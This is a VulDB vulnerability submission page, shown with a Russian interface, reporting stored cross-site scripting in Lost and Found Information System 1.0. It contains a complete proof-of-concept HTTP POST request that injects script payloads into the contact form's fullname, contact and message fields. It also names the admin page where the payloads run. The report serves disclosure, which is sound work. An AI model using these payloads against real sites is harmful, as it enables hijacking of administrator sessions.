Отправить #155183: Stored XSS in Lost and Found Information System 1.0 View message send from contact formИнформация

Название	Stored XSS in Lost and Found Information System 1.0 View message send from contact form
Описание	Detail: Stored XSS in Lost and Found Information System 1.0 in admin View message send from contact form Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html Production: Lost and Found Information System Version: 1.0 Request: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------3651031312771010866996354889 Content-Length: 839 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/?page=contact Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="id" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="visitor" -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="fullname" Tuan"><script>alert('1')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="email" [email protected] -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="contact" Tuan"><script>alert('2')</script> -----------------------------3651031312771010866996354889 Content-Disposition: form-data; name="message" Tuan"><script>alert('3')</script> -----------------------------3651031312771010866996354889-- View effect: /php-lfis/admin/?page=inquiries/view_inquiry&id=2
Источник	⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Пользователь	huutuanbg97 (UID 45015)
Представление	11.05.2023 15:33 (3 лет назад)
Модерация	12.05.2023 08:01 (16 hours later)
Статус	принято
Запись VulDB	228887 [SourceCodester Lost and Found Information System 1.0 Contact Form Master.php?f=save_inquiry fullname/contact/message межсайтовый скриптинг]
Баллы	20

◂ Предыдущий Обзор Далее ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!